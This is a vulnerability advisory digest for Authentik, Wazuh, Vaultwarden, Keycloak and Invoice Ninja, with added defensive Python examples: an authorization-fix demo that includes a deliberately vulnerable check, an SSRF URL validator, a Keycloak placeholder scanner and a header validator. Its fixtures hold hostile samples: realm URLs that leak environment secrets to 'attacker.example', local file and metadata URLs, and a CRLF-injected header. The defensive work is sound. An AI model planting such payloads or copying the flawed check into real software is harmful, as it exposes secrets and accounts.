In Authentik versions before 2024.10.4 a medium severity vulnerability, CVE-2024-11623, was detected. It allows authenticated admin users to upload crafted SVG files as application icons. Because SVG is an XML document that browsers render as active content, script elements, event-handler attributes and javascript: links inside the icon execute in the browser of every user who views it, resulting in stored XSS. To address this issue, upgrade Authentik to version 2024.10.4 or later. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-11623.
In Wazuh versions prior to 4.9.0 a high severity vulnerability, CVE-2024-35177, was detected. When the Windows agent is installed in a non-default location, the installation directory is left with overly permissive ACLs, so a local attacker can place malicious files (for example DLLs that the agent loads) in the agent folder and have them executed with the privileges of the agent service, escalating to full system access. To fix this issue, upgrade Wazuh to version 4.9.0. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-35177.
In Wazuh versions up to and including 4.9.0 a medium severity vulnerability, CVE-2024-47770, was detected. A missing authorization check allows users who lack the required permission to view the Wazuh agent list, exposing inventory details about the monitored systems. To fix this issue, upgrade Wazuh to version 4.9.1. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-47770.
In Vaultwarden versions prior to 1.33.0 a high severity vulnerability, CVE-2025-24365, was detected. An attacker who already holds the owner or admin role in one organization and knows the ID of a target organization can grant themselves owner rights in the target organization, because the authorization check did not verify that the caller's role applies to the organization named in the request. To address this issue, upgrade Vaultwarden to version 1.33.0. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2025-24365.
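The bug class described above is a role check that is not bound to the resource in the request. The following is an added illustration of that pattern and its fix, not Vaultwarden's code: the membership table, user and organization names are constructed, and the vulnerable check stands for the general mistake (is the caller privileged anywhere?) rather than the project's actual code path.

```python
PRIVILEGED_ROLES = {"owner", "admin"}


class OrgStore:
    """Constructed in-memory membership table keyed (user_id, org_id) -> role. Not Vaultwarden's schema."""

    def __init__(self, memberships):
        self.memberships = dict(memberships)

    def can_manage_vulnerable(self, caller, target_org):
        # Bug pattern: the check confirms the caller is an owner/admin *somewhere*;
        # target_org is never consulted, so any org owner passes for any org ID.
        return any(user == caller and role in PRIVILEGED_ROLES
                   for (user, _org), role in self.memberships.items())

    def can_manage_fixed(self, caller, target_org):
        # The caller's role must be looked up in the organization being modified.
        return self.memberships.get((caller, target_org)) in PRIVILEGED_ROLES

    def set_role(self, caller, target_org, member, new_role, check=None):
        """Change a member's role in target_org after the given authorization check passes."""
        check = check or self.can_manage_fixed
        if not check(caller, target_org):
            raise PermissionError(f"{caller} may not manage {target_org}")
        self.memberships[(member, target_org)] = new_role
        return new_role


# Constructed data: mallory owns only org-M; org-B belongs to bob.
SAMPLE = {
    ("alice", "org-A"): "owner",
    ("bob", "org-B"): "owner",
    ("carol", "org-B"): "user",
    ("mallory", "org-M"): "owner",
}


def attack_demo(check_name):
    """Mallory, knowing only org-B's ID, tries to make herself its owner. True if it worked."""
    store = OrgStore(SAMPLE)
    try:
        store.set_role("mallory", "org-B", "mallory", "owner", check=getattr(store, check_name))
    except PermissionError:
        return False
    return store.memberships.get(("mallory", "org-B")) == "owner"


if __name__ == "__main__":
    print("vulnerable check, attack succeeded:", attack_demo("can_manage_vulnerable"))
    print("fixed check, attack succeeded:", attack_demo("can_manage_fixed"))
```

The general rule: every identifier taken from the path or body (here the organization ID) must be part of the authorization lookup, not just the caller's identity.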
In Keycloak versions 26.1.0 and prior a medium severity vulnerability, CVE-2025-0604, was detected. When a user backed by Active Directory resets their password, Keycloak updates it without performing an LDAP bind to validate the account against AD, so users whose AD accounts are expired or disabled can regain access through Keycloak, bypassing the restriction enforced in AD. Currently, there is no fix version for this issue. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2025-0604.
In Invoice Ninja versions 5.8.56 through 5.11.23 a high severity vulnerability, CVE-2025-0474, was detected. It is an authenticated Server-Side Request Forgery (SSRF): a logged-in user can make the server fetch attacker-chosen URLs, which allows arbitrary file read (through local file URLs) and requests to internal network resources with the privileges of the application user. Currently, there is no fix version for this issue. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2025-0474.
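The two consequences named above, file read and access to internal resources, map to the two controls an outbound-URL validator needs: an allowlist of schemes (so file: and similar never reach the fetcher) and a check that every address the host resolves to is public. The following is an added example, not Invoice Ninja's code; the host names and DNS answers are constructed so it runs offline, and the resolver is injectable for that reason.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # file:, gopher:, ftp: are what turn SSRF into file read
# Non-public ranges that older ipaddress versions do not report as private; blocked explicitly.
EXTRA_BLOCKED = [ipaddress.ip_network(n) for n in ("100.64.0.0/10", "192.0.0.0/24", "198.18.0.0/15")]


class UnsafeURL(ValueError):
    """Raised when an outbound URL must not be fetched."""


def system_resolver(host):
    """Resolve with the OS resolver; returns the set of address strings."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(addr):
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    if (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified):
        return False
    return not any(ip in net for net in EXTRA_BLOCKED)


def validate_outbound_url(url, resolver=system_resolver):
    """Return the sorted public addresses the URL resolves to, or raise UnsafeURL."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} is not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeURL("URL has no host")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo in URL is not allowed")  # classic parser-confusion vector
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal address, nothing to resolve
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        raise UnsafeURL(f"{host} does not resolve")
    for addr in addrs:  # every answer must be public, not just the first one
        if not is_public_address(addr):
            raise UnsafeURL(f"{host} resolves to non-public address {addr}")
    return sorted(addrs)


def is_safe_outbound_url(url, resolver=system_resolver):
    try:
        validate_outbound_url(url, resolver)
        return True
    except UnsafeURL:
        return False


# Constructed DNS answers so the example runs offline (93.184.216.34 is just a public stand-in).
FAKE_DNS = {
    "api.example.com": {"93.184.216.34"},
    "rebound.example": {"93.184.216.34", "127.0.0.1"},  # mixed answers: one public, one loopback
    "metadata.example": {"169.254.169.254"},
}


def fake_resolver(host):
    return FAKE_DNS.get(host, set())


if __name__ == "__main__":
    for u in ("https://api.example.com/v1", "file:///etc/passwd", "http://metadata.example/"):
        print(u, "->", is_safe_outbound_url(u, fake_resolver))
```

Validation alone leaves a time-of-check gap: a DNS name that passes here can point at 127.0.0.1 by the time the HTTP client connects, and an allowed host can redirect to an internal one. The fetch step should connect to one of the addresses returned here rather than resolving again, and redirects should be disabled or re-validated hop by hop.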
In Keycloak versions prior to 26.0.8 a medium severity vulnerability, CVE-2024-11736, was detected. It allows admin users to read sensitive server environment variables and system properties through URLs stored in the configuration: placeholders such as ${env.VARNAME} or ${PROPNAME} are expanded by the server when it processes the URL, so the resolved value becomes visible to the attacker. To address this issue, upgrade Keycloak to version 26.0.8 or later. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2024-11736.
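Upgrading stops the expansion, but URLs an admin planted before the upgrade are still in the realm configuration. The following added script (not Keycloak's code) walks a realm export and reports ${env.*} placeholders anywhere and any other ${...} placeholder in a URL-typed field. Keycloak's i18n placeholders in display names (e.g. ${client_account}) and its own URL placeholders in the default clients (${authBaseUrl}, ${authAdminUrl}) are deliberately not reported; the realm export below is constructed for the example.

```python
import json
import re

PLACEHOLDER = re.compile(r"\$\{[^}]*\}")
ENV_PLACEHOLDER = re.compile(r"\$\{env\.[^}]*\}")
# Keycloak's own URL placeholders found in default clients (allowlist; extend if your export has more).
ALLOWED_URL_PLACEHOLDERS = {"${authBaseUrl}", "${authAdminUrl}"}


def _is_url_key(key):
    """Heuristic for fields Keycloak treats as URLs: rootUrl, baseUrl, redirectUris, webOrigins, tokenUrl, ..."""
    return key.lower().endswith(("url", "uri", "uris", "urls", "origins"))


def find_placeholders(node, path="$", key=None):
    """Walk the export; return (json_path, value, reason) for every suspicious string."""
    hits = []
    if isinstance(node, dict):
        for k, v in node.items():
            hits.extend(find_placeholders(v, f"{path}.{k}", k))
    elif isinstance(node, list):
        for i, v in enumerate(node):
            hits.extend(find_placeholders(v, f"{path}[{i}]", key))
    elif isinstance(node, str):
        found = PLACEHOLDER.findall(node)
        if not found:
            return hits
        if ENV_PLACEHOLDER.search(node):
            hits.append((path, node, "expands a server environment variable"))
        elif key is not None and _is_url_key(key) and any(p not in ALLOWED_URL_PLACEHOLDERS for p in found):
            hits.append((path, node, "system-property placeholder in a URL field"))
    return hits


# Constructed realm export: one default-looking client, one planted by a malicious admin,
# and an identity provider whose token URL leaks a JVM system property.
REALM_EXPORT = json.loads("""
{
  "realm": "demo",
  "clients": [
    {"clientId": "account", "name": "${client_account}", "rootUrl": "${authBaseUrl}",
     "baseUrl": "/realms/demo/account/", "redirectUris": ["/realms/demo/account/*"]},
    {"clientId": "evil-client", "name": "Evil",
     "rootUrl": "https://attacker.example/${env.DB_PASSWORD}",
     "redirectUris": ["https://attacker.example/cb?h=${user.home}"]}
  ],
  "identityProviders": [
    {"alias": "corp-oidc", "config": {"authorizationUrl": "https://idp.example/auth",
                                     "tokenUrl": "https://idp.example/token?v=${java.version}"}}
  ]
}
""")


if __name__ == "__main__":
    for path, value, reason in find_placeholders(REALM_EXPORT):
        print(f"{path}: {value!r} ({reason})")
```

Run it against `kc.sh export` output (or the admin API's realm representation) after upgrading, and treat every hit as a configuration change made by an account that should be reviewed.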
In Keycloak version 21.0.2 and other releases before 26.0.8 a medium severity vulnerability, CVE-2024-11734, was detected. It allows an administrative user with permission to change realm settings to disrupt the service by inserting newline characters into the realm's security header values; the malformed headers cause responses to fail, making the service unavailable. To fix this issue, upgrade Keycloak to version 26.0.8. For more details, visit https://nvd.nist.gov/vuln/detail/cve-2024-11734.
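The check that prevents this class of problem is validation of admin-supplied header values against the HTTP field-value grammar (RFC 9110: visible characters, with space and tab only between them; no CR, LF or other control characters). The following added example, not Keycloak's code, applies that check to the browserSecurityHeaders map of a realm export; the realm is constructed and includes one CRLF-injected value and one with trailing whitespace.

```python
import re

# RFC 9110 field-value: VCHAR or obs-text, with SP/HTAB allowed only between them.
_FIELD_VALUE = re.compile(r"^(?:[\x21-\x7e\x80-\xff](?:[\x21-\x7e\x80-\xff \t]*[\x21-\x7e\x80-\xff])?)?$")


def header_value_problem(value):
    """Return None if value is a legal header value, else a short description of why not."""
    if not isinstance(value, str):
        return "not a string"
    if "\r" in value or "\n" in value:
        return "contains CR/LF (would terminate the header and start a new line)"
    if not _FIELD_VALUE.match(value):
        return "contains control characters or leading/trailing whitespace"
    return None


def check_browser_security_headers(realm):
    """Return {setting: problem} for every bad value under a realm export's browserSecurityHeaders."""
    problems = {}
    for setting, value in realm.get("browserSecurityHeaders", {}).items():
        problem = header_value_problem(value)
        if problem:
            problems[setting] = problem
    return problems


# Constructed realm fragment; the first three values are Keycloak's defaults.
SAMPLE_REALM = {
    "realm": "demo",
    "browserSecurityHeaders": {
        "contentSecurityPolicy": "frame-src 'self'; frame-ancestors 'self'; object-src 'none';",
        "xFrameOptions": "SAMEORIGIN",
        "xContentTypeOptions": "nosniff",
        "strictTransportSecurity": "max-age=31536000; includeSubDomains\r\nX-Injected: 1",
        "referrerPolicy": "no-referrer ",
    },
}


if __name__ == "__main__":
    for setting, problem in check_browser_security_headers(SAMPLE_REALM).items():
        print(f"{setting}: {problem}")
```

The same validator belongs in front of any code path that writes user-controlled data into a response header, not only the realm settings form.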
In Vaultwarden versions before 1.32.5 a critical severity vulnerability, CVE-2024-55225, was detected. It allows attackers to impersonate other users, including administrators, by sending a crafted authorization request. To address this issue, upgrade Vaultwarden to version 1.32.5 or later. For more details, visit https://avd.aquasec.com/nvd/2024/cve-2024-55225.